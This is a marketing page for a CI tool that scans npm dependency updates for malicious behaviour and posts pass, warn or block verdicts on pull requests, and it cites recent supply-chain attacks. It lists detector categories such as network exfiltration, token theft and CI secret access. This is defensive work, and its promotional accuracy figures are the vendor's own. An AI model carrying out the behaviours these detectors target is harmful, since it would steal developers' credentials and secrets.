原文
Behavioral Supply Chain Intelligence
Get visibility into dependency behavior in your CI pipeline. Every package change gets a risk score and behavioral report — flag suspicious packages for review, auto-approve the rest. Configurable thresholds, allowlists, and a full audit trail for compliance.
No credit card required. Free forever.
Why You Need an Intake Gate
In 2025, these unreviewed dependency updates hit production.
None had a CVE. No intake process caught them. They merged through standard PR workflows.
2.6B chalk + debug hijack Weekly downloads compromised
500+ Shai-Hulud worm Packages infected in 24 hours
2,349 S1ngularity campaign Credentials stolen via install scripts
23K tj-actions breach Repos exposed, led to Coinbase breach
Without intake control
- Dependencies merge unreviewed
- CVE tools miss zero-day attacks
- No policy enforcement on upgrades
- No audit trail for compliance
With Dependency Guardian
- Every upgrade gets a verdict before merge
- Behavioral analysis catches new attacks
- Configurable pass/warn/block thresholds
- Full scan history and audit trail
Policy enforcement
Set thresholds, allowlist trusted packages, choose warn vs. block per repository. Your governance rules, automated.
Approval workflow
Every lockfile change gets a verdict posted as a PR comment. Review flagged packages before they merge.
5-minute CI setup
One YAML file or npm i -g @westbayberry/dg. Works with GitHub Actions, GitLab CI, Jenkins, and more.
Compliance-ready audit trail
Every scan logged with verdicts, risk scores, and findings. Built for teams that need to prove what was reviewed.
Detection accuracy validated against 11,000+ real packages (99.95% precision, 99.7% F1): See benchmarks →
How it works
From dependency change to approved merge in four steps.
Step 01
Pull Request
A developer opens a PR that adds or updates npm packages in your lockfile.
package-lock.json
Step 02
Scan for Attacks
26 behavioral detectors analyze every file in each package for malicious code patterns.
26 detectors
Step 03
Pass / Warn / Block
A risk score determines the verdict — safe to merge, review needed, or blocked outright.
risk score
Step 04
Ship Safe
Merge with confidence knowing every dependency change was analyzed before reaching main.
merge ready❯_ GITHUB ACTIONS
PR #247 bump lodash 4.17.20 → 4.17.21 → Scanning 3 changed packages... → Running 26 detectors across 847 files → PASS — safe to merge
❯_ CLI
$ dg scan Discovering package changes... Scanning 3 packages (git-diff)... Dependency Guardian Score: 0 PASS 3 packages scanned, 0 flagged
In your pull request
Every dependency change gets a verdict posted directly in the PR. Review, approve, or block before merge.
Ship with confidence. Every dependency upgrade is reviewed, scored, and logged before it reaches main.
Built for dependency governance
Six capabilities that turn dependency updates into a controlled process.
CI enforcement on every PR
Runs automatically when package-lock.json changes. One YAML file. Every dependency upgrade goes through your intake gate before it can merge.
Configurable policy engine
Set risk thresholds per repository. Allowlist trusted packages. Choose between warn and block modes. Your governance rules, enforced automatically.
Pass / Warn / Block verdicts
Every PR gets a risk score and a clear verdict. Block mode prevents merging. Warn mode flags for human review. Your team stays in control.
Audit trail and scan history
Every scan is logged with verdicts, risk scores, and findings. Track who approved what, when. Built for compliance reviews and security audits.
Behavioral analysis engine
26 detectors analyze what packages actually do — install scripts, network calls, credential access, obfuscation. Catches zero-day attacks that CVE databases miss.
Your source code stays private
Only npm packages are scanned. Your application code is never uploaded. Self-hosted option available for enterprise environments.
What powers the verdicts
26 behavioral detectors analyze what packages actually do — the engine behind every pass, warn, and block decision.
Install Scripts Child Process Network Exfiltration Obfuscation Diff Risk Fresh Publish Maintainer Change Sensitive Paths Binary Addons Filesystem Persistence CI Secret Access Suspicious API GitHub Reputation Source Mismatch Purpose Mismatch Typosquat Root Scripts Behavior Drift Token Theft Worm Behavior Preinstall Timing Legitimate API Exfil Bun Runtime Evasion Dependency Confusion Browser Phishing Empty Package
Works everywhere you build
GitHub Actions, GitLab CI, Jenkins, Bitbucket, CircleCI, or your terminal.